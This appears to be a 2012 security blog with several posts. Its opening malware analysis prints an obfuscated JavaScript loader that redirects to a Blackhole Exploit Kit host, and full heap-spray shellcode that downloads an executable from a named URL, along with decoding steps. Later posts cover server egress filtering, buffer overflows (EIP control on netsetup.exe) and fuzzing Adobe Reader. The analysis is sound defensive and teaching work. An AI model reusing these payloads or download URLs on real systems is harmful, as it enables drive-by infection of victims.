1i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i5
7i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
   v="ev"+"a"+"l";
 }
 if(v)e=window[v];
 w=f;
 s=[];
 r=String;
 for(;689!=i;i+=1)
 {
   j=i;
   s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
 }
 if(f)z=s;
 e(z);


We can do a quick review of the code in this script and identify the logic structures.  The "if" statement starting on the third line will execute only in a browser environment (where window.document exists), and it adds a small test of its own: parseInt("0123") returns 83 only where a leading zero is treated as octal, as older browser engines do.  The "for" loop at the bottom is a decoding loop that builds the variable "s".  The last line is actually an "eval" against the "z" variable, which is a copy of "s" made in the second-to-last line.  To ferret out what this code is really trying to do, we can strip the environment checks and change the last "eval" to a "document.write":

c=3-1;i=c-2;


f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i7
2i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
v="ev"+"a"+"l";
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
  j=i;
  s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
//e(z);
document.write(z);

When we run this, we find code that will redirect the web browser to http[:]//a7ot8.tlpvqsltnh.is-lost.org/g/, which, when this code was captured, was a starting point for a Blackhole Exploit Kit (BEK) attack.
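If you would rather not run attacker-supplied JavaScript at all, the same decoding can be reproduced offline.  Here is a minimal Python sketch, assuming the sample uses the same scheme as the script above (numbers separated by "i", each shifted by 40).  The function name decode_shifted is my own, and the sample string is just the first eleven values of the array above.

```python
def decode_shifted(encoded, sep="i", shift=40):
    """Rebuild the hidden script: split on the separator, add the shift, map to characters."""
    return "".join(chr(int(token) + shift) for token in encoded.split(sep) if token)


# First eleven values copied from the obfuscated array above.
sample = "0i62i77i70i59i76i65i71i70i0i1"
print(decode_shifted(sample))  # prints "(function()"
```

Other samples will use a different separator or shift, so treat both as parameters to adjust rather than constants.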

ATTACK PAYLOAD
Now, let's look at the second example we have: a direct JavaScript exploit.  Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated.  I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack.  So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.

In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script.  A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample).  But let's focus on the payload to figure out what an infected system would do:

%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F%u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78%u6870%u3F70%u6572%u3D67%u0001

For this, we can use a variety of tools or even scripting.  The key point to remember is that this is machine code intended to be run directly in memory: the exploit redirects EIP to the NOP sled at the beginning, and execution then slides into the rest of the instructions.  Another thing to remember is that on x86 the 16-bit values in these %u escapes are stored in little-endian order (least significant byte first), which for our purposes means that we swap the bytes in each pair (i.e. change u3574 to u7435).  You can do this in your favorite scripting language.  You can also use Malzilla's "Misc Decoders" tab for this.  Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):

awk 'gsub("%u"," ") { x=1; while(x<=NF) { printf "0x" substr($x,3,2) ",0x" substr($x,1,2) ","; x++; } }'

In any case, you should have something like this in the end:

0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xEB,0x54,0x8B,0x75,0x3C,0x8B,0x74,0x35,0x78,0x03,0xF5,0x56,0x8B,0x76,0x20,0x03,0xF5,0x33,0xC9,0x49,0x41,0xAD,0x33,0xDB,0x36,0x0F,0xBE,0x14,0x28,0x38,0xF2,0x74,0x08,0xC1,0xCB,0x0D,0x03,0xDA,0x40,0xEB,0xEF,0x3B,0xDF,0x75,0xE7,0x5E,0x8B,0x5E,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5E,0x1C,0x03,0xDD,0x8B,0x04,0x8B,0x03,0xC5,0xC3,0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,0x64,0x6C,0x6C,0x00,0x43,0x3A,0x5C,0x55,0x2E,0x65,0x78,0x65,0x00,0x33,0xC0,0x64,0x03,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x40,0x3C,0x95,0xBF,0x8E,0x4E,0x0E,0xEC,0xE8,0x84,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x3C,0xFF,0xD0,0x95,0x50,0xBF,0x36,0x1A,0x2F,0x70,0xE8,0x6F,0xFF,0xFF,0xFF,0x8B,0x54,0x24,0xFC,0x8D,0x52,0xBA,0x33,0xDB,0x53,0x53,0x52,0xEB,0x24,0x53,0xFF,0xD0,0x5D,0xBF,0x98,0xFE,0x8A,0x0E,0xE8,0x53,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x62,0xFF,0xD0,0xBF,0x7E,0xD8,0xE2,0x73,0xE8,0x40,0xFF,0xFF,0xFF,0x52,0xFF,0xD0,0xE8,0xD7,0xFF,0xFF,0xFF,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x6D,0x70,0x33,0x2E,0x72,0x65,0x61,0x6C,0x69,0x7A,0x65,0x2E,0x68,0x6B,0x2F,0x6C,0x6F,0x67,0x69,0x6E,0x2F,0x69,0x6E,0x64,0x65,0x78,0x2E
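If awk is not your thing, the same byte swap can be sketched in Python.  This is only one way to do it: the function name unescape_to_bytes is hypothetical, and the sample is the first few %u values that follow the NOP sled in the payload above.

```python
import re
import struct


def unescape_to_bytes(payload):
    """Turn %uXXXX escapes into raw bytes, least significant byte first."""
    words = re.findall(r"%u([0-9A-Fa-f]{4})", payload)
    # "<H" packs each 16-bit value in little-endian order, which is the byte swap.
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)


sample = "%u9090%u54EB%u758B%u8B3C%u3574"
print(unescape_to_bytes(sample).hex())  # prints 9090eb548b753c8b7435
```

Because the result is already binary, it can be written straight to a file and inspected with hexdump or any other tool.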

Now, you can convert the hex strings to binary in any number of ways.  Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):




xxd -r -ps /tmp/payload.hex | hexdump -Cv



The output should look like this:



00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 eb 54 8b 75  3c 8b 74 35 78 03 f5 56  |.....T.u<.t5x..V|
00000020  8b 76 20 03 f5 33 c9 49  41 ad 33 db 36 0f be 14  |.v ..3.IA.3.6...|
00000030  28 38 f2 74 08 c1 cb 0d  03 da 40 eb ef 3b df 75  |(8.t......@..;.u|
00000040  e7 5e 8b 5e 24 03 dd 66  8b 0c 4b 8b 5e 1c 03 dd  |.^.^$..f..K.^...|
00000050  8b 04 8b 03 c5 c3 75 72  6c 6d 6f 6e 2e 64 6c 6c  |......urlmon.dll|
00000060  00 43 3a 5c 55 2e 65 78  65 00 33 c0 64 03 40 30  |.C:\U.exe.3.d.@0|
00000070  78 0c 8b 40 0c 8b 70 1c  ad 8b 40 08 eb 09 8b 40  |x..@..p...@....@|
00000080  34 8d 40 7c 8b 40 3c 95  bf 8e 4e 0e ec e8 84 ff  |4.@|.@<...N.....|
00000090  ff ff 83 ec 04 83 2c 24  3c ff d0 95 50 bf 36 1a  |......,$<...P.6.|
000000a0  2f 70 e8 6f ff ff ff 8b  54 24 fc 8d 52 ba 33 db  |/p.o....T$..R.3.|
000000b0  53 53 52 eb 24 53 ff d0  5d bf 98 fe 8a 0e e8 53  |SSR.$S..]......S|
000000c0  ff ff ff 83 ec 04 83 2c  24 62 ff d0 bf 7e d8 e2  |.......,$b...~..|
000000d0  73 e8 40 ff ff ff 52 ff  d0 e8 d7 ff ff ff 68 74  |s.@...R.......ht|
000000e0  74 70 3a 2f 2f 6d 70 33  2e 72 65 61 6c 69 7a 65  |tp://mp3.realize|
000000f0  2e 68 6b 2f 6c 6f 67 69  6e 2f 69 6e 64 65 78 2e  |.hk/login/index.|
00000100



After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download: 
  • urlmon.dll
  • C:\U.exe
  • http[:]//mp3.realize.hk/login/index.php?reg=
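Pulling those strings out by eye works for a payload this small, but it can also be automated.  Below is a rough Python sketch of a "strings"-style scan, assuming the payload has already been converted to binary.  The function name ascii_strings and the minimum length of 4 are my own choices, and the sample bytes are copied from offsets 0x55 to 0x6b of the hexdump above.

```python
import re


def ascii_strings(data, min_len=4):
    """Return runs of printable ASCII that are at least min_len bytes long."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode("ascii") + rb",}")
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


# Bytes 0x55-0x6b of the hexdump: c3, "urlmon.dll", NUL, "C:\U.exe", NUL, 33 c0.
sample = bytes.fromhex("c375726c6d6f6e2e646c6c00433a5c552e6578650033c0")
for found in ascii_strings(sample):
    print(found)
```

Short runs such as the lone "3" (0x33) are filtered out by the minimum length, which keeps stray opcode bytes from cluttering the results.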

IN CLOSING
When you can quickly provide these types of results to your network defenders, it goes a long way toward detecting and preventing infections on your network.  

Thanks for reading and hopefully you've found this post informative.  If there are topics you would like to see in the future, please drop us a line.


Thursday, November 8, 2012

Restricting Server Internet Access

It should be a no-brainer not to do this, but you'd be amazed at how many different environments I've worked in where the security/networking staff would allow their servers to talk outbound using HTTP/HTTPS.  While there are some occasions where this is necessary, it should certainly be limited to only the critical functions and requisite URLs/IP addresses.  Allowing servers to access the Internet can have potentially dangerous consequences resulting in loss of data confidentiality, integrity and availability. 

Circumstances where a server might need to get out to the Internet include anti-virus updates, operating system patches and 3rd party application updates such as from Adobe or Java.  These processes should be configured to funnel their traffic through "bridgehead servers" that function for this purpose.  Microsoft provides WSUS (Windows Server Update Services) that can be used as a centralized point for providing updates not only to your clients, but your servers as well.  Additionally, McAfee, Symantec, and the other AV vendors generally provide the ability to allow just one device to go to the Internet and get the updates for distribution amongst the rest of your environment.  While this provides efficiency and in some cases a centralized reporting structure for your client devices, it should be viewed as a necessity for servers.  So, use your proxy server or your firewall to only allow the connections from the boxes that are acting as bridgeheads to the corresponding service provider on the Internet and be done with it.  While it is not impossible for Microsoft or any of the others to be compromised, the chances are pretty low and it is a risk worth taking. 

As I've mentioned in my previous posts, it is critical that we as network/security engineers try to eliminate as much unneeded traffic as possible, thus providing ourselves the ability to more closely examine the traffic that is allowed.  Also, getting back to the point of servers specifically, with bridgehead servers for critical update functions, we can deny all outbound web traffic from our server farm, thus potentially eliminating any C2 channels. If you have a Blue Coat or other brand of web filtering proxy, you can even use the built-in categories or create your own that include the sites necessary to keep your software updated.  Additionally, it will prevent administrators from surfing the web from servers.  Again, it was amazing to see environments where system admins would log in to servers and check their webmail or go to any number of sites that they should not be viewing from a server.  Chances are that an account logged onto a server will have elevated credentials, thus giving any infection a more significant impact.   With no ability to get to the Internet, the server is better protected against infection and, if somehow infected, has a decreased likelihood of allowing C2 to an attacker, both effects we should strive for as security professionals. 

Thursday, November 1, 2012

Regarding Buffer Overflows

In the network security world, vulnerabilities and exploits are currency.  Without vulnerabilities, there would be no exploits.  Without exploits, there would be no network attacks.  Exploits can come in many forms and recently, the user has been the vulnerability: poor password security, phishing emails and other social engineering attacks have become more prevalent.  This is due to hardened network defenses, increased patching and the general lack of new exploitable software vulnerabilities.  Years ago, a system could be taken over by simply sending a network packet or two to the target system from halfway around the world.  But how did that happen?  What is different now?  

Today, there is more awareness of Buffer Overflows in the development world.  This, along with technical enhancements such as Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR) and Stack Canaries (that shut down programs that misbehave), limits the impact of this vulnerability.  But there are always workarounds and it is essentially an arms race between the attackers and defenders.  Fundamentally, Buffer Overflows are still a problem, but exploiting them is not as easy as it once was.

This post aims to describe Buffer Overflow vulnerabilities in simple terms as well as provide a real world example.  It's not an easy task, mainly because of the technical details, but let's try anyway.

WHAT IS AN OVERFLOW?
An overflow is what it sounds like: too much of something that doesn't fit in a container will overflow.  In programming terms, these are typically stack overflows or heap overflows.  The main difference is where in memory this overflow happens.  When a program needs to take in information, it allocates memory of a size that the programmer has specified and attempts to write data to that memory space.  If the amount of data written is larger than the space provided, an overflow occurs.  When this happens, other parts of memory are overwritten, which may or may not cause problems, but typically they will overwrite something important, causing memory corruption.  When the running program tries to read from that part of memory, it usually crashes.  

An attacker, after discovering that a program has a buffer overflow problem, can customize the data corruption in an attempt to control the crash.  Controlling the crash will allow the attacker to control the system.

CONTROLLING THE CRASH
How does an attacker control the crash?  By controlling EIP.  To illustrate this, we will demonstrate a stack buffer overflow using a simple, imaginary program:


C:\TEMP>hello.exe Mike
Hi there, Mike!

The imaginary program above, when run, will print out the words "Hi there, " followed by whatever was given as an argument to the program.  In this case, the name "Mike".  This is then followed by an exclamation point and a new line.  The program then exits.

The program looks like this at an extremely high level:

Create Name Variable (4 bytes);
Read Name from Command Line;
Print "Hi there, " + Name + "!\n";
exit;

When the program starts, it will allocate memory space for the Name variable.  In our example, let's say it allocates 4 bytes.  If we then provide a longer name like "Emily", with 5 characters, when the program reads "Emily" and tries to put it into the Name variable, we have an overflow.  Then we may get a nice little program crash. (For the purposes of this post, I won't go into details like the NULL or CRLF characters at the end of the input string).

Even a simple program like the one above will use almost 50 lines of CPU instructions.  Any function calls, like the Print command, can easily add to the number of instructions that a program needs.  You can imagine how many instructions are needed for more useful programs.  Luckily, today's processors can execute billions of instructions a second, although even those seem slow at times.  

So where does EIP come in?  EIP is a register, a small storage location inside the CPU itself, that contains the memory address of the next instruction to execute.  After an instruction executes, EIP is changed to the memory address of the next instruction to run.  Essentially, EIP is where the CPU looks for the next thing to do.

STACKS
There is another part of memory called the "stack."  This is where programs can store temporary information for use later (like "Mike" or "Emily").  In the example above, the second instruction uses a function to read user input into the Name variable.  In this case, let's pretend that the function used to write to the Name variable is "strcpy" (a common function to copy strings - String Copy), which has its instructions in memory address 0x08048.  When the CPU gets to this part of the program, it will call that function using a jump (JMP) instruction.  But before it does that, it copies the address of the next instruction into the stack so it knows where to go back to when it's done.  (On a real x86 CPU, this save-then-jump pair is a single CALL instruction; we keep the two steps separate here for clarity.)  So at a high level, this program looks like:

0x00001: Create Name
0x00005: strcpy (0x08048) Name from Command Line
0x00008: Print (printf, located at 0x080a9) "Hi there," + Name + "!\n"
0x0000a: exit

When our hello.exe program runs, the CPU executes the instructions at memory address 0x00001.  The next line of code is at memory address 0x00005.  The CPU then changes EIP to 0x00005. Then 0x00005 is executed, but since it points to another memory location outside of the normal execution, the address 0x00008 is written to the stack as a sort of bookmark for where to go back to when the strcpy function is completed.  The command "JMP 0x08048" is then executed.  EIP is changed to 0x08048.  Execution begins at 0x08048 until it is done.  When it is complete, the CPU instruction "RET" (short for return) is executed.  This tells the CPU to take the last value written to the stack, in this case 0x00008 and then copy that to EIP.  The CPU then continues execution from 0x00008.

Command execution is then:

0x00001
0x00005 (JMP to 0x08048, copy 0x00008 to the stack)
0x08048
RET (copy top of stack (0x00008) to EIP)
0x00008 (JMP to 0x080a9, copy 0x0000a to the stack)
0x080a9
RET (copy top of stack (0x0000a) to EIP)
0x0000a
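To make the bookkeeping concrete, here is a toy Python model of the walk-through above.  It is a sketch, not a CPU emulator: the operation names ("plain", "call", "ret", "exit") and the function trace_execution are invented for illustration, and each function is reduced to a single RET.

```python
def trace_execution(program, entry):
    """Follow EIP through a toy program, using a stack for return addresses."""
    stack = []
    trace = []
    eip = entry
    while eip is not None:
        trace.append(eip)
        operation, target, next_address = program[eip]
        if operation == "call":
            stack.append(next_address)  # bookmark where to come back to
            eip = target
        elif operation == "ret":
            eip = stack.pop()           # copy the top of the stack into EIP
        elif operation == "exit":
            eip = None
        else:
            eip = next_address
    return trace


# Addresses taken from the hello.exe example; each entry is
# (operation, call target, address of the following instruction).
program = {
    0x00001: ("plain", None, 0x00005),
    0x00005: ("call", 0x08048, 0x00008),
    0x08048: ("ret", None, None),
    0x00008: ("call", 0x080A9, 0x0000A),
    0x080A9: ("ret", None, None),
    0x0000A: ("exit", None, None),
}
print([hex(address) for address in trace_execution(program, 0x00001)])
# prints ['0x1', '0x5', '0x8048', '0x8', '0x80a9', '0xa']
```

Notice that RET trusts whatever value is on top of the stack.  That trust is exactly what an overflow abuses.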

PROGRAM CRASH
In our example, we used "Emily" as the Name.  Now, since the Name only has 4 bytes, when "Emily" is written to memory, the last letter "y" (0x79) is written past the 4 bytes.  What is past the 4 bytes?  Who knows?  No one really, at first.  But one thing about computers is that they are consistent.  The memory structures are the same every time a program is run.  If the overflow goes into the area of the stack where something important is written, say the address to return to (0x00008), when the strcpy function is done and RET is executed, the CPU will try to copy 0x00008 into EIP, except in this case, it's been changed to 0x79008.  The CPU will copy that into EIP and then try to execute the instructions at 0x79008, which is likely garbage and the CPU will error out with "illegal instruction at 0x79008."

On the next run, an attacker could then simply change "Emily" into different values that mean something, causing EIP to point to a part of memory the attacker controls.  Remember that an overflow is continuously written to memory.  If we used a very long name instead of Emily, the name we chose will be in memory.  Whole swaths of memory will be overwritten.  Since the attacker can now control EIP, they can simply change it to the memory address of instructions other than the normal ones, and now the attacker owns your system.
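The overwrite itself can be imitated safely in Python with a byte array standing in for the stack.  This is a simplified model under loud assumptions: the 4-byte Name buffer sits directly below a 32-bit little-endian return address, and the helper names make_frame, unchecked_copy and saved_return are made up for this sketch.  With that layout the "y" lands in the low byte, so the corrupted value comes out as 0x79 rather than the illustrative 0x79008 used above.

```python
import struct

NAME_SIZE = 4  # bytes reserved for Name, as in the example


def make_frame(return_address):
    """Toy stack frame: the Name buffer followed by a 32-bit saved return address."""
    return bytearray(NAME_SIZE) + bytearray(struct.pack("<I", return_address))


def unchecked_copy(frame, data):
    """Write data from the start of the frame without a bounds check, as strcpy would."""
    frame[0:len(data)] = data


def saved_return(frame):
    """Read back the value RET would load into EIP."""
    return struct.unpack_from("<I", frame, NAME_SIZE)[0]


# A name that fits, a name that overflows, and a name crafted to pick the address.
for name in (b"Mike", b"Emily", b"AAAA" + struct.pack("<I", 0x0BADC0DE)):
    frame = make_frame(0x00000008)
    unchecked_copy(frame, name)
    print(name, hex(saved_return(frame)))
```

"Mike" leaves the return address at 0x8, "Emily" corrupts it by accident, and the crafted input sets it to a value of the attacker's choosing (0x0BADC0DE here, an arbitrary placeholder).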

REAL WORLD EXAMPLE
If you want to see this in the real world, fire up an old Windows XP system.  There is a command line program built-in called "netsetup.exe".  If you have a newer system, you can still try this, but it's been patched sometime since Windows XP, so your mileage will vary.  In any case, it's still worth seeing the process in action.  Note that Windows 7 does not have netsetup.exe.

Step 1: Open a command line prompt by running "cmd.exe"
Step 2: Run the program netsetup.exe (it's in the PATH, so you can run it from anywhere).
Step 3: Give netsetup.exe an argument of AAAA:


C:\TEMP>netsetup.exe AAAA

You will get a box that says "Command Line Syntax Error"

Step 4: Add more AAAAs until you get a program crash (hint: it starts to crash at 271 characters).  


C:\TEMP>netsetup.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



If you examine the technical details of the crash, you should find that one of the registers (Windows calls it "P7") has a value of 41414141.  A capital "A" has a hex value of 0x41.  What you are seeing is EIP with a value of 0x41414141, which caused the program to crash because it tried to execute instructions at that memory address.  If you change the letters at the end of your 271 characters to say ABCD, you will see P7 change to something like 44434241.  You are now controlling EIP.
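Typing 271 characters by hand gets old fast, so here is a small Python sketch for building the argument and predicting what the register should show.  The function names are hypothetical, and the 271-character length is simply the crash point mentioned above for this particular program.

```python
import struct


def build_argument(total_length=271, marker=b"ABCD", filler=b"A"):
    """Pad with filler so that the marker occupies the last bytes of the argument."""
    return filler * (total_length - len(marker)) + marker


def as_register_value(four_bytes):
    """Interpret four bytes the way a little-endian x86 register would show them."""
    return struct.unpack("<I", four_bytes)[0]


argument = build_argument()
print(len(argument))                          # prints 271
print(hex(as_register_value(b"AAAA")))        # prints 0x41414141
print(hex(as_register_value(argument[-4:])))  # prints 0x44434241
```

The reversed order (44434241 for "ABCD") is the same little-endian byte ordering at work: the first character ends up in the least significant byte.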

At this point, one could then fire up a debugger and examine memory when the program crashes and find out where the rest of the "AAAAAA"s went in memory, attempt to change the "AAAAAA"s to actual instructions and then modify the last part to point to where the attacker's instructions are in memory.  

TERMS OF ENDEARMENT
The series of characters that make up the attacker's instructions (usually minimal code to give the attacker some level of control) is called the payload.  The coding problem of netsetup.exe that allows memory to be overwritten is called a vulnerability.  If the attacker can actually run their own code against this vulnerability, this would be an exploitable vulnerability.  If not, and all they can do is crash the program, it's still a vulnerability but not exploitable.

FULL DISCLOSURE
Since netsetup.exe is a really old program, this is not really a vulnerability disclosure.  I do not know if netsetup is fully exploitable or not.  This would require local execution since netsetup.exe is not a networked program and the input to the program comes from the command line.  But the process for finding vulnerabilities in network-aware programs is the same: keep feeding it garbage and wait for it to crash.  When it crashes, examine memory and see if there is some kind of overflow involved and whether, as an attacker, you can craft input to the program via network packets that would give you control of EIP.  "Fuzzing" programs (like this one) automate a lot of this manual process by heaping varying amounts and types of data at a program and then recording the crashes.  Vulnerability hunters generally write their own fuzzers to help with this.  Finally, it is important to point out that these are really simple examples.  There is a lot more involved in vulnerability hunting and exploitation, but this is the gist of it.

IF YOU'VE READ THIS FAR
Hopefully this gives some clarity to some of the terms that are thrown around in the network security world as opposed to adding to the confusion.  In future posts, we'll examine process spawning and the different types of exploits (local, remote, privilege escalation).  Thanks for reading!

Thursday, October 25, 2012

Fuzzing the Iceberg: Finding Vulnerabilities in Third Party Software

The Iceberg
Since 2005, the number of vulnerabilities revealed annually has been generally consistent, between 7,000 and 9,000 [1]. According to Carnegie Mellon University's CERT/Software Engineering Institute, this number is 'likely an order of magnitude lower' than the total number of vulnerabilities discovered in the wild. Amazingly, based on their expertise in software engineering and experience fuzzing, CERT believes that about 70,000 software vulnerabilities are found each year and simply not reported [2].

Typically, 75% of vulnerabilities can be attributed to third party applications. The other 25% are due to vulnerabilities within Microsoft programs and Operating Systems [3]. The largest of these third party culprits are Adobe and Oracle.  These vendors not only represent a large number of vulnerabilities discovered, but they also represent a stunning number of the critical vulnerabilities revealed each year.

Fuzzing Adobe Reader
With this in mind, we can use the Failure Observation Engine 2 (FOE) by CERT to automatically identify potential vulnerabilities in Windows-based applications. The FOE fuzzer works by taking an input of seedfiles which are manipulated with Python scripts. These manipulated seedfiles are then sent as input to an application in hopes of making it crash. Upon detection of a "crasher case", FOE can capture the state of memory and registers. From this information, it can determine whether or not the crash represents an exploitable overflow case. In the basic example below, I'll walk you through the steps I followed to start fuzzing Adobe Reader 11.0.0 for file format vulnerabilities. 
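To give a feel for what "manipulating a seedfile" means, here is a minimal Python sketch of one common mutation strategy: corrupting a small random fraction of the bytes. This is not FOE's actual code or algorithm. The function name mutate, the 1% default ratio and the stand-in seed bytes are all assumptions made for illustration.

```python
import random


def mutate(seed_bytes, ratio=0.01, rng=None):
    """Return a copy of the seed with roughly `ratio` of its bytes corrupted."""
    rng = rng or random.Random()
    data = bytearray(seed_bytes)
    if not data:
        return b""
    count = max(1, int(len(data) * ratio))
    for offset in rng.sample(range(len(data)), count):
        # XOR with a non-zero value guarantees the byte actually changes.
        data[offset] ^= rng.randint(1, 255)
    return bytes(data)


# Stand-in seed: a PDF-style header followed by padding (not a real PDF file).
seed = b"%PDF-1.4\n" + bytes(91)
fuzzed = mutate(seed, ratio=0.05, rng=random.Random(1234))
changed = sum(1 for before, after in zip(seed, fuzzed) if before != after)
print(len(fuzzed), changed)  # prints 100 5
```

A real campaign would write each mutated file to disk, launch the target against it, and watch for crashes, which is the part FOE automates.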

